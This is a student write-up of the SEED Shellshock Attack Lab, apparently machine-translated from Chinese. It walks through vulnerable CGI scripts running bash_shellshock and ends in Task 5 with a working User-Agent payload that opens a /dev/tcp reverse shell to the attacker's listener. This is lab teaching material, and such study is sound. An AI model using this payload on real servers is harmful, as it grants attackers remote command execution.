Shellshock Attack Lab

Use Ubuntu 16.04
20.04 have access to docker Or install apache Do the back task

Task1

Bash Version of ： Provided in this book SEED Ubuntu 16.04 In the virtual machine , There are two versions Bash The program is located in /bin Directory . One version is called Bash, This version has been patched , So I won't suffer from Shellshock The impact of the attack . Running in the terminal shell The program is safe Bash edition , It changes the behavior of function passing . Another version is called bash_shellshock, This version has not been patched . So in the experiment of this chapter , You need to use a vulnerable version , Otherwise, the attack will not succeed .
So we have to prepare a loophole bash edition

Task2

In this experiment , We will be on the remote Web Originating on the server Shellshock attack .
many Web All servers are enabled CGI, This is used in Web Page and Web A standard way to generate dynamic content on an application . many CGI Procedure is to use Shell Scripted . therefore , In execution CGI Before the program , Will be called first shell Program , And this call is triggered by the user from the remote computer . If Shell The program is vulnerable Bash Program , We can use Shellshock Vulnerable vulnerabilities gain privileges on the server .
In this mission , We will build a very simple CGI Program （ be called myprog.cgi）, As shown below .

#!/bin/bash_shellshock *
echo "Content-type: text/plain"
echo
echo
echo "Hello World"

It only uses shell The script prints out “ Hello World”.
Will be more than CGI The program is placed in / usr / lib / cgi-bin Directory , And set its permissions to 755（ So it's an executable ）

Execute command line program curl Do the same thing ：

$ curl http://localhost/cgi-bin/myprog.cgi

In our setup , We run from the same computer Web Servers and attacks , That's why localhost Why . In the actual attack , The server is running on a remote computer , We use the host name of the server or IP Address instead of localhost.

You can see the printed characters “hello world”

Task3

Take advantage of Bash Of CGI In program Shellshock Loophole , Attackers need to pass their data to vulnerable Bash Program , And you need to pass data through environment variables . In this mission , We need to know how to achieve this .
Use the following CGI The program demonstrates that you can CGI The program sends any string , And the string will be displayed in one of the environment variables

#!/bin/bash_shellshock
echo "Content-type: text/plain"
echo
echo "****** Environment Variables ******"
strings /proc/$$/environ 

Put it in the specified folder and chmod

function ：
You can see that the environment variables are printed successfully , When CGI When the program is called , First of all FORK Create a new process , And then use exec（） Function to execute CGI Program , because CGI The program starts with #！/bin/bash, So the program is a shell Script , So after he carried it out ,bash Will execute shell Script , When a child process is created, it executes bash when , It's for bash The process provides environment variables , Pass to child process . Some of these environment variables can be manually controlled to pass in specified characters , for example USER_AGENT etc. .

Task4

After setting the above CGI After procedure , We can now start Shellshock attack . The attack does not depend on CGI Content in the program , Because its target is Bash Program , The program in CGI The script is called first before execution . Our goal is to pass URL http：//localhost/cgi-bin/myprog.cgi attack , To achieve goals that remote users cannot achieve .
We can steal the database password by constructing appropriate instructions ：

Task5

Shellshock The vulnerability allows an attacker to run arbitrary commands on the target computer . In the actual attack , Attackers usually choose to run Shell command , Instead of hard coding in the attack , So long as Shell The program still exists , They can use this Shell Run other commands . To achieve this goal , The attacker needs to run reverse Shell. reverse Shell It was started on the computer Shell process , Its input and output are controlled by someone on the remote computer . Basically ,shell Run on the victim's computer , But it takes input from the attacker's computer , And print its output on the attacker's computer . A reverse shell allows an attacker to easily run commands on an infected computer .
stay Selsbck Create reverse in attack shell. The attacker runs first “nc -lv 9090 Command to start TCP The server .

Then run the following command to the target server CGI The program sends a malicious request .
once curl The instruction was executed , Attack instructions are also executed on the server , This will lead to CGI The program triggers a Bash shell. The Bash shell Will be connected to 192.168.88.130 Of 9090 port ( Attacker's machine attacker's nc The program will accept this connection , And display the CGI The trigger Bash From the program shell Prompt , This indicates reverse shell succeed . It can be downloaded from id Command to confirm this , It prints out the remote CGI Users of the process ID yes www-data.

We go through —A Option to set the requested USER_AGENT Options , And then we pass our command construction ,shellshock Convert the environment variable to its own shell Variable , If you find an environment variable that starts with a pair of parentheses , Convert it to shell function . In this case USER_AGENT Be transformed into a shell Function and three shell Command and execute . At this point, we can achieve the desired results .
attacker adopt -A Pass in USER_AGENT environment variable , The environment variable passes through shellshock It can be parsed as follows :
USER_AGENT () { echo hello; }; echo Content_type: text/plain; echo; echo; /bin/bash -i > /dev/tcp/192.168.88.130/9090 0<&1 2>&1
Equivalent to the server On the implementation ：
/bin/bash -i > /dev/tcp/192.168.88.130/9090 0<&1 2>&1